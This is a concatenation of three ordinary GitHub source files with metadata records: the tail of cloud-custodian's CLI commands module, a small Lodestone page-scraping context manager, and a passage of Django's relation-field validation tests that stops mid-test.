provider_resources = provider.resources('aws')
components[0] = "aws.%s" % components[0]
# Completions for resource
if len(components) == 1:
choices = [r for r in provider.resources().keys()
if r.startswith(components[0])]
if len(choices) == 1:
choices += ['{}{}'.format(choices[0], '.')]
return choices
if components[0] not in provider_resources.keys():
return []
# Completions for category
if len(components) == 2:
choices = ['{}.{}'.format(components[0], x)
for x in ('actions', 'filters') if x.startswith(components[1])]
if len(choices) == 1:
choices += ['{}{}'.format(choices[0], '.')]
return choices
# Completions for item
elif len(components) == 3:
resource_mapping = schema.resource_vocabulary(cloud_provider)
return ['{}.{}.{}'.format(components[0], components[1], x)
for x in resource_mapping[components[0]][components[1]]]
return []
def schema_cmd(options):
""" Print info about the resources, actions and filters available. """
if options.json:
schema.json_dump(options.resource)
return
load_resources()
resource_mapping = schema.resource_vocabulary()
if options.summary:
schema.summary(resource_mapping)
return
# Here are the formats for what we accept:
# - No argument
# - List all available RESOURCES
# - RESOURCE
# - List all available actions and filters for supplied RESOURCE
# - RESOURCE.actions
# - List all available actions for supplied RESOURCE
# - RESOURCE.actions.ACTION
# - Show class doc string and schema for supplied action
# - RESOURCE.filters
# - List all available filters for supplied RESOURCE
# - RESOURCE.filters.FILTER
# - Show class doc string and schema for supplied filter
if not options.resource:
resource_list = {'resources': sorted(provider.resources().keys())}
print(yaml.safe_dump(resource_list, default_flow_style=False))
return
# Format is [PROVIDER].RESOURCE.CATEGORY.ITEM
# optional provider defaults to aws for compatibility
components = options.resource.split('.')
if components[0] in provider.clouds.keys():
cloud_provider = components.pop(0)
resource_mapping = schema.resource_vocabulary(
cloud_provider)
components[0] = '%s.%s' % (cloud_provider, components[0])
else:
resource_mapping = schema.resource_vocabulary('aws')
components[0] = 'aws.%s' % components[0]
#
# Handle resource
#
resource = components[0].lower()
if resource not in resource_mapping:
log.error('{} is not a valid resource'.format(resource))
sys.exit(1)
if len(components) == 1:
del(resource_mapping[resource]['classes'])
output = {resource: resource_mapping[resource]}
print(yaml.safe_dump(output))
return
#
# Handle category
#
category = components[1].lower()
if category not in ('actions', 'filters'):
log.error("Valid choices are 'actions' and 'filters'. You supplied '{}'".format(category))
sys.exit(1)
if len(components) == 2:
output = "No {} available for resource {}.".format(category, resource)
if category in resource_mapping[resource]:
output = {resource: {
category: resource_mapping[resource][category]}}
print(yaml.safe_dump(output))
return
#
# Handle item
#
item = components[2].lower()
if item not in resource_mapping[resource][category]:
log.error('{} is not in the {} list for resource {}'.format(item, category, resource))
sys.exit(1)
if len(components) == 3:
cls = resource_mapping[resource]['classes'][category][item]
# Print docstring
docstring = _schema_get_docstring(cls)
print("\nHelp\n----\n")
if docstring:
print(docstring)
else:
# Shouldn't ever hit this, so exclude from cover
print("No help is available for this item.") # pragma: no cover
# Print schema
print("\nSchema\n------\n")
if hasattr(cls, 'schema'):
print(json.dumps(cls.schema, indent=4))
else:
# Shouldn't ever hit this, so exclude from cover
print("No schema is available for this item.", file=sys.sterr) # pragma: no cover
print('')
return
# We received too much (e.g. s3.actions.foo.bar)
log.error("Invalid selector '{}'. Max of 3 components in the "
"format RESOURCE.CATEGORY.ITEM".format(options.resource))
sys.exit(1)
def _metrics_get_endpoints(options):
""" Determine the start and end dates based on user-supplied options. """
if bool(options.start) ^ bool(options.end):
log.error('--start and --end must be specified together')
sys.exit(1)
if options.start and options.end:
start = options.start
end = options.end
else:
end = datetime.utcnow()
start = end - timedelta(options.days)
return start, end
@policy_command
def metrics_cmd(options, policies):
start, end = _metrics_get_endpoints(options)
data = {}
for p in policies:
log.info('Getting %s metrics', p)
data[p.name] = p.get_metrics(start, end, options.period)
print(dumps(data, indent=2))
def version_cmd(options):
from c7n.version import version
if not options.debug:
print(version)
return
indent = 13
pp = pprint.PrettyPrinter(indent=indent)
print("\nPlease copy/paste the following info along with any bug reports:\n")
print("Custodian: ", version)
pyversion = sys.version.replace('\n', '\n' + ' ' * indent) # For readability
print("Python: ", pyversion)
# os.uname is only available on recent versions of Unix
try:
print("Platform: ", os.uname())
except Exception: # pragma: no cover
print("Platform: ", sys.platform)
print("Using venv: ", hasattr(sys, 'real_prefix'))
print("PYTHONPATH: ")
pp.pprint(sys.path)
| {
"content_hash": "b1537fada0a2597e04504e5106aad487",
"timestamp": "",
"source": "github",
"line_count": 460,
"max_line_length": 98,
"avg_line_length": 32.87826086956522,
"alnum_prop": 0.592964824120603,
"repo_name": "JohnTheodore/cloud-custodian",
"id": "972e4046b03ffd82d0a74d7c99bc4d63d5a5e5ac",
"size": "15714",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "c7n/commands.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "31"
},
{
"name": "Makefile",
"bytes": "6346"
},
{
"name": "Python",
"bytes": "2533086"
}
],
"symlink_target": ""
} |
from api import app
from api.constants import USER_AGENT
from api.exceptions import InvalidRequest
from lxml import html
from requests import get
class HTMLFromLoadstone(object):
def __init__(self, url):
self.url = url
def __enter__(self):
app.logger.debug('Attempting to parse url {}'.format(self.url))
headers = {'User-Agent': USER_AGENT}
page = get(self.url, headers=headers)
if page.status_code == 404:
raise InvalidRequest('Lodestone ID does not exist')
assert page.status_code == 200
return html.fromstring(page.text)
def __exit__(self, exc_type, exc_val, exc_tb):
pass
| {
"content_hash": "329401ddd50c3eb43a0b59366530966f",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 71,
"avg_line_length": 25.846153846153847,
"alnum_prop": 0.6428571428571429,
"repo_name": "Demotivated/loadstone",
"id": "c57f50f02f3c0b860d482e4a36090504a1e2167f",
"size": "672",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/scrapers/context_managers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38682"
}
],
"symlink_target": ""
} |
from unittest import mock
from django.core.checks import Error, Warning as DjangoWarning
from django.db import connection, models
from django.db.models.fields.related import ForeignObject
from django.test.testcases import SimpleTestCase
from django.test.utils import isolate_apps, override_settings
@isolate_apps('invalid_models_tests')
class RelativeFieldTests(SimpleTestCase):
def test_valid_foreign_key_without_accessor(self):
class Target(models.Model):
# There would be a clash if Model.field installed an accessor.
model = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, related_name='+')
field = Model._meta.get_field('field')
self.assertEqual(field.check(), [])
def test_foreign_key_to_missing_model(self):
# Model names are resolved when a model is being created, so we cannot
# test relative fields in isolation and we need to attach them to a
# model.
class Model(models.Model):
foreign_key = models.ForeignKey('Rel1', models.CASCADE)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
"Field defines a relation with model 'Rel1', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
])
@isolate_apps('invalid_models_tests')
def test_foreign_key_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('OtherModel', models.CASCADE)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_to_missing_model(self):
class Model(models.Model):
m2m = models.ManyToManyField("Rel2")
field = Model._meta.get_field('m2m')
self.assertEqual(field.check(from_model=Model), [
Error(
"Field defines a relation with model 'Rel2', "
"which is either not installed, or is abstract.",
obj=field,
id='fields.E300',
),
])
@isolate_apps('invalid_models_tests')
def test_many_to_many_to_isolate_apps_model(self):
"""
#25723 - Referenced model registration lookup should be run against the
field's model registry.
"""
class OtherModel(models.Model):
pass
class Model(models.Model):
m2m = models.ManyToManyField('OtherModel')
field = Model._meta.get_field('m2m')
self.assertEqual(field.check(from_model=Model), [])
def test_many_to_many_with_limit_choices_auto_created_no_warning(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(Model, limit_choices_to={'name': 'test_name'})
self.assertEqual(ModelM2M.check(), [])
def test_many_to_many_with_useless_options(self):
class Model(models.Model):
name = models.CharField(max_length=20)
class ModelM2M(models.Model):
m2m = models.ManyToManyField(
Model,
null=True,
validators=[lambda x: x],
limit_choices_to={'name': 'test_name'},
through='ThroughModel',
through_fields=('modelm2m', 'model'),
)
class ThroughModel(models.Model):
model = models.ForeignKey('Model', models.CASCADE)
modelm2m = models.ForeignKey('ModelM2M', models.CASCADE)
field = ModelM2M._meta.get_field('m2m')
self.assertEqual(ModelM2M.check(), [
DjangoWarning(
'null has no effect on ManyToManyField.',
obj=field,
id='fields.W340',
),
DjangoWarning(
'ManyToManyField does not support validators.',
obj=field,
id='fields.W341',
),
DjangoWarning(
'limit_choices_to has no effect on ManyToManyField '
'with a through model.',
obj=field,
id='fields.W343',
),
])
def test_ambiguous_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
field = models.ManyToManyField('Person', through="AmbiguousRelationship", related_name='tertiary')
class AmbiguousRelationship(models.Model):
# Too much foreign keys to Person.
first_person = models.ForeignKey(Person, models.CASCADE, related_name="first")
second_person = models.ForeignKey(Person, models.CASCADE, related_name="second")
second_model = models.ForeignKey(Group, models.CASCADE)
field = Group._meta.get_field('field')
self.assertEqual(field.check(from_model=Group), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.field', but it has more than one "
"foreign key to 'Person', which is ambiguous. You must specify "
"which foreign key Django should use via the through_fields "
"keyword argument.",
hint=(
'If you want to create a recursive relationship, use '
'ForeignKey("self", symmetrical=False, through="AmbiguousRelationship").'
),
obj=field,
id='fields.E335',
),
])
def test_relationship_model_with_foreign_key_to_wrong_model(self):
class WrongModel(models.Model):
pass
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
person = models.ForeignKey(Person, models.CASCADE)
wrong_foreign_key = models.ForeignKey(WrongModel, models.CASCADE)
# The last foreign key should point to Group model.
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not "
"have a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
])
def test_relationship_model_missing_foreign_key(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="InvalidRelationship")
class InvalidRelationship(models.Model):
group = models.ForeignKey(Group, models.CASCADE)
# No foreign key to Person
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Group.members', but it does not have "
"a foreign key to 'Group' or 'Person'.",
obj=InvalidRelationship,
id='fields.E336',
),
])
def test_missing_relationship_model(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through="MissingM2MModel")
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=field,
id='fields.E331',
),
])
def test_missing_relationship_model_on_model_check(self):
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through='MissingM2MModel')
self.assertEqual(Group.check(), [
Error(
"Field specifies a many-to-many relation through model "
"'MissingM2MModel', which has not been installed.",
obj=Group._meta.get_field('members'),
id='fields.E331',
),
])
@isolate_apps('invalid_models_tests')
def test_many_to_many_through_isolate_apps_model(self):
"""
#25723 - Through model registration lookup should be run against the
field's model registry.
"""
class GroupMember(models.Model):
person = models.ForeignKey('Person', models.CASCADE)
group = models.ForeignKey('Group', models.CASCADE)
class Person(models.Model):
pass
class Group(models.Model):
members = models.ManyToManyField('Person', through='GroupMember')
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [])
def test_too_many_foreign_keys_in_self_referential_model(self):
class Person(models.Model):
friends = models.ManyToManyField('self', through="InvalidRelationship", symmetrical=False)
class InvalidRelationship(models.Model):
first = models.ForeignKey(Person, models.CASCADE, related_name="rel_from_set_2")
second = models.ForeignKey(Person, models.CASCADE, related_name="rel_to_set_2")
third = models.ForeignKey(Person, models.CASCADE, related_name="too_many_by_far")
field = Person._meta.get_field('friends')
self.assertEqual(field.check(from_model=Person), [
Error(
"The model is used as an intermediate model by "
"'invalid_models_tests.Person.friends', but it has more than two "
"foreign keys to 'Person', which is ambiguous. You must specify "
"which two foreign keys Django should use via the through_fields "
"keyword argument.",
hint='Use through_fields to specify which two foreign keys Django should use.',
obj=InvalidRelationship,
id='fields.E333',
),
])
def test_foreign_key_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_foreign_key = models.ForeignKey('AbstractModel', models.CASCADE)
rel_class_foreign_key = models.ForeignKey(AbstractModel, models.CASCADE)
fields = [
Model._meta.get_field('rel_string_foreign_key'),
Model._meta.get_field('rel_class_foreign_key'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
self.assertEqual(field.check(), [expected_error])
def test_m2m_to_abstract_model(self):
class AbstractModel(models.Model):
class Meta:
abstract = True
class Model(models.Model):
rel_string_m2m = models.ManyToManyField('AbstractModel')
rel_class_m2m = models.ManyToManyField(AbstractModel)
fields = [
Model._meta.get_field('rel_string_m2m'),
Model._meta.get_field('rel_class_m2m'),
]
expected_error = Error(
"Field defines a relation with model 'AbstractModel', "
"which is either not installed, or is abstract.",
id='fields.E300',
)
for field in fields:
expected_error.obj = field
self.assertEqual(field.check(from_model=Model), [expected_error])
def test_unique_m2m(self):
class Person(models.Model):
name = models.CharField(max_length=5)
class Group(models.Model):
members = models.ManyToManyField('Person', unique=True)
field = Group._meta.get_field('members')
self.assertEqual(field.check(from_model=Group), [
Error(
'ManyToManyFields cannot be unique.',
obj=field,
id='fields.E330',
),
])
def test_foreign_key_to_non_unique_field(self):
class Target(models.Model):
bad = models.IntegerField() # No unique=True
class Model(models.Model):
foreign_key = models.ForeignKey('Target', models.CASCADE, to_field='bad')
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
])
def test_foreign_key_to_non_unique_field_under_explicit_model(self):
class Target(models.Model):
bad = models.IntegerField()
class Model(models.Model):
field = models.ForeignKey(Target, models.CASCADE, to_field='bad')
field = Model._meta.get_field('field')
self.assertEqual(field.check(), [
Error(
"'Target.bad' must set unique=True because it is referenced by a foreign key.",
obj=field,
id='fields.E311',
),
])
def test_foreign_object_to_non_unique_fields(self):
class Person(models.Model):
# Note that both fields are not unique.
country_id = models.IntegerField()
city_id = models.IntegerField()
class MMembership(models.Model):
person_country_id = models.IntegerField()
person_city_id = models.IntegerField()
person = models.ForeignObject(
Person,
on_delete=models.CASCADE,
from_fields=['person_country_id', 'person_city_id'],
to_fields=['country_id', 'city_id'],
)
field = MMembership._meta.get_field('person')
self.assertEqual(field.check(), [
Error(
"No subset of the fields 'country_id', 'city_id' on model 'Person' is unique.",
hint=(
"Add unique=True on any of those fields or add at least "
"a subset of them to a unique_together constraint."
),
obj=field,
id='fields.E310',
)
])
def test_on_delete_set_null_on_non_nullable_field(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_NULL)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
'Field specifies on_delete=SET_NULL, but cannot be null.',
hint='Set null=True argument on the field, or change the on_delete rule.',
obj=field,
id='fields.E320',
),
])
def test_on_delete_set_default_without_default_value(self):
class Person(models.Model):
pass
class Model(models.Model):
foreign_key = models.ForeignKey('Person', models.SET_DEFAULT)
field = Model._meta.get_field('foreign_key')
self.assertEqual(field.check(), [
Error(
'Field specifies on_delete=SET_DEFAULT, but has no default value.',
hint='Set a default value, or change the on_delete rule.',
obj=field,
id='fields.E321',
),
])
def test_nullable_primary_key(self):
class Model(models.Model):
field = models.IntegerField(primary_key=True, null=True)
field = Model._meta.get_field('field')
with mock.patch.object(connection.features, 'interprets_empty_strings_as_nulls', False):
results = field.check()
self.assertEqual(results, [
Error(
'Primary keys must not have null=True.',
hint='Set null=False on the field, or remove primary_key=True argument.',
obj=field,
id='fields.E007',
),
])
def test_not_swapped_model(self):
class SwappableModel(models.Model):
# A model that can be, but isn't swapped out. References to this
# model should *not* raise any validation error.
class Meta:
swappable = 'TEST_SWAPPABLE_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappableModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappableModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappableModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappableModel',
related_name='implicit_m2m',
)
explicit_fk = Model._meta.get_field('explicit_fk')
self.assertEqual(explicit_fk.check(), [])
implicit_fk = Model._meta.get_field('implicit_fk')
self.assertEqual(implicit_fk.check(), [])
explicit_m2m = Model._meta.get_field('explicit_m2m')
self.assertEqual(explicit_m2m.check(from_model=Model), [])
implicit_m2m = Model._meta.get_field('implicit_m2m')
self.assertEqual(implicit_m2m.check(from_model=Model), [])
@override_settings(TEST_SWAPPED_MODEL='invalid_models_tests.Replacement')
def test_referencing_to_swapped_model(self):
class Replacement(models.Model):
pass
class SwappedModel(models.Model):
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class Model(models.Model):
explicit_fk = models.ForeignKey(
SwappedModel,
models.CASCADE,
related_name='explicit_fk',
)
implicit_fk = models.ForeignKey(
'invalid_models_tests.SwappedModel',
models.CASCADE,
related_name='implicit_fk',
)
explicit_m2m = models.ManyToManyField(SwappedModel, related_name='explicit_m2m')
implicit_m2m = models.ManyToManyField(
'invalid_models_tests.SwappedModel',
related_name='implicit_m2m',
)
fields = [
Model._meta.get_field('explicit_fk'),
Model._meta.get_field('implicit_fk'),
Model._meta.get_field('explicit_m2m'),
Model._meta.get_field('implicit_m2m'),
]
expected_error = Error(
("Field defines a relation with the model "
"'invalid_models_tests.SwappedModel', which has been swapped out."),
hint="Update the relation to point at 'settings.TEST_SWAPPED_MODEL'.",
id='fields.E301',
)
for field in fields:
expected_error.obj = field
self.assertEqual(field.check(from_model=Model), [expected_error])
def test_related_field_has_invalid_related_name(self):
digit = 0
illegal_non_alphanumeric = '!'
whitespace = '\t'
invalid_related_names = [
'%s_begins_with_digit' % digit,
'%s_begins_with_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'%s_begins_with_whitespace' % whitespace,
'contains_%s_illegal_non_alphanumeric' % illegal_non_alphanumeric,
'contains_%s_whitespace' % whitespace,
'ends_with_with_illegal_non_alphanumeric_%s' % illegal_non_alphanumeric,
'ends_with_whitespace_%s' % whitespace,
'with', # a Python keyword
'related_name\n',
'',
',', # non-ASCII
]
class Parent(models.Model):
pass
for invalid_related_name in invalid_related_names:
Child = type('Child%s' % invalid_related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=invalid_related_name),
'__module__': Parent.__module__,
})
field = Child._meta.get_field('parent')
self.assertEqual(Child.check(), [
Error(
"The name '%s' is invalid related_name for field Child%s.parent"
% (invalid_related_name, invalid_related_name),
hint="Related name must be a valid Python identifier or end with a '+'",
obj=field,
id='fields.E306',
),
])
def test_related_field_has_valid_related_name(self):
lowercase = 'a'
uppercase = 'A'
digit = 0
related_names = [
'%s_starts_with_lowercase' % lowercase,
'%s_tarts_with_uppercase' % uppercase,
'_starts_with_underscore',
'contains_%s_digit' % digit,
'ends_with_plus+',
'_+',
'+',
'試',
'試驗+',
]
class Parent(models.Model):
pass
for related_name in related_names:
Child = type('Child%s' % related_name, (models.Model,), {
'parent': models.ForeignKey('Parent', models.CASCADE, related_name=related_name),
'__module__': Parent.__module__,
})
self.assertEqual(Child.check(), [])
def test_to_fields_exist(self):
class Parent(models.Model):
pass
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
Parent,
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(), [
Error(
"The to_field 'a' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
Error(
"The to_field 'b' doesn't exist on the related model 'invalid_models_tests.Parent'.",
obj=field,
id='fields.E312',
),
])
def test_to_fields_not_checked_if_related_model_doesnt_exist(self):
class Child(models.Model):
a = models.PositiveIntegerField()
b = models.PositiveIntegerField()
parent = ForeignObject(
'invalid_models_tests.Parent',
on_delete=models.SET_NULL,
from_fields=('a', 'b'),
to_fields=('a', 'b'),
)
field = Child._meta.get_field('parent')
self.assertEqual(field.check(), [
Error(
"Field defines a relation with model 'invalid_models_tests.Parent', "
"which is either not installed, or is abstract.",
id='fields.E300',
obj=field,
),
])
def test_invalid_related_query_name(self):
class Target(models.Model):
pass
class Model(models.Model):
first = models.ForeignKey(Target, models.CASCADE, related_name='contains__double')
second = models.ForeignKey(Target, models.CASCADE, related_query_name='ends_underscore_')
self.assertEqual(Model.check(), [
Error(
"Reverse query name 'contains__double' must not contain '__'.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('first'),
id='fields.E309',
),
Error(
"Reverse query name 'ends_underscore_' must not end with an "
"underscore.",
hint=("Add or change a related_name or related_query_name "
"argument for this field."),
obj=Model._meta.get_field('second'),
id='fields.E308',
),
])
@isolate_apps('invalid_models_tests')
class AccessorClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_accessor_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_accessor_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_accessor_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_accessor_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model_set = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.model_set'.",
hint=("Rename field 'Target.model_set', or add/change "
"a related_name argument to the definition "
"for field 'Model.rel'."),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
])
def test_clash_between_accessors(self):
class Target(models.Model):
pass
class Model(models.Model):
foreign = models.ForeignKey(Target, models.CASCADE)
m2m = models.ManyToManyField(Target)
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.foreign' clashes with reverse accessor for 'Model.m2m'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.foreign' or 'Model.m2m'."
),
obj=Model._meta.get_field('foreign'),
id='fields.E304',
),
Error(
"Reverse accessor for 'Model.m2m' clashes with reverse accessor for 'Model.foreign'.",
hint=(
"Add or change a related_name argument to the definition "
"for 'Model.m2m' or 'Model.foreign'."
),
obj=Model._meta.get_field('m2m'),
id='fields.E304',
),
])
def test_m2m_to_m2m_with_inheritance(self):
""" Ref #22047. """
class Target(models.Model):
pass
class Model(models.Model):
children = models.ManyToManyField('Child', related_name="m2m_clash", related_query_name="no_clash")
class Parent(models.Model):
m2m_clash = models.ManyToManyField('Target')
class Child(Parent):
pass
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.children' clashes with field name 'Child.m2m_clash'.",
hint=(
"Rename field 'Child.m2m_clash', or add/change a related_name "
"argument to the definition for field 'Model.children'."
),
obj=Model._meta.get_field('children'),
id='fields.E302',
)
])
def test_no_clash_for_hidden_related_name(self):
class Stub(models.Model):
pass
class ManyToManyRel(models.Model):
thing1 = models.ManyToManyField(Stub, related_name='+')
thing2 = models.ManyToManyField(Stub, related_name='+')
class FKRel(models.Model):
thing1 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
thing2 = models.ForeignKey(Stub, models.CASCADE, related_name='+')
self.assertEqual(ManyToManyRel.check(), [])
self.assertEqual(FKRel.check(), [])
@isolate_apps('invalid_models_tests')
class ReverseQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE))
def test_fk_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE))
def test_m2m_to_integer(self):
self._test_reverse_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target'))
def test_m2m_to_fk(self):
self._test_reverse_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target'))
def test_m2m_to_m2m(self):
self._test_reverse_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target'))
def _test_reverse_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
model = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.model'.",
hint=(
"Rename field 'Target.model', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class ExplicitRelatedNameClashTests(SimpleTestCase):
def test_fk_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_fk_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey('Target', models.CASCADE, related_name='clash'))
def test_m2m_to_integer(self):
self._test_explicit_related_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_fk(self):
self._test_explicit_related_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name='clash'))
def test_m2m_to_m2m(self):
self._test_explicit_related_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField('Target', related_name='clash'))
def _test_explicit_related_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse accessor for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E302',
),
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class ExplicitRelatedQueryNameClashTests(SimpleTestCase):
def test_fk_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_integer(self, related_name=None):
self.test_fk_to_integer(related_name='+')
def test_fk_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_fk(self):
self.test_fk_to_fk(related_name='+')
def test_fk_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ForeignKey(
'Target',
models.CASCADE,
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_fk_to_m2m(self):
self.test_fk_to_m2m(related_name='+')
def test_m2m_to_integer(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.IntegerField(),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_integer(self):
self.test_m2m_to_integer(related_name='+')
def test_m2m_to_fk(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ForeignKey('Another', models.CASCADE),
relative=models.ManyToManyField('Target', related_name=related_name, related_query_name='clash'))
def test_hidden_m2m_to_fk(self):
self.test_m2m_to_fk(related_name='+')
def test_m2m_to_m2m(self, related_name=None):
self._test_explicit_related_query_name_clash(
target=models.ManyToManyField('Another'),
relative=models.ManyToManyField(
'Target',
related_name=related_name,
related_query_name='clash',
)
)
def test_hidden_m2m_to_m2m(self):
self.test_m2m_to_m2m(related_name='+')
def _test_explicit_related_query_name_clash(self, target, relative):
class Another(models.Model):
pass
class Target(models.Model):
clash = target
class Model(models.Model):
rel = relative
self.assertEqual(Model.check(), [
Error(
"Reverse query name for 'Model.rel' clashes with field name 'Target.clash'.",
hint=(
"Rename field 'Target.clash', or add/change a related_name "
"argument to the definition for field 'Model.rel'."
),
obj=Model._meta.get_field('rel'),
id='fields.E303',
),
])
@isolate_apps('invalid_models_tests')
class SelfReferentialM2MClashTests(SimpleTestCase):
def test_clash_between_accessors(self):
class Model(models.Model):
first_m2m = models.ManyToManyField('self', symmetrical=False)
second_m2m = models.ManyToManyField('self', symmetrical=False)
self.assertEqual(Model.check(), [
Error(
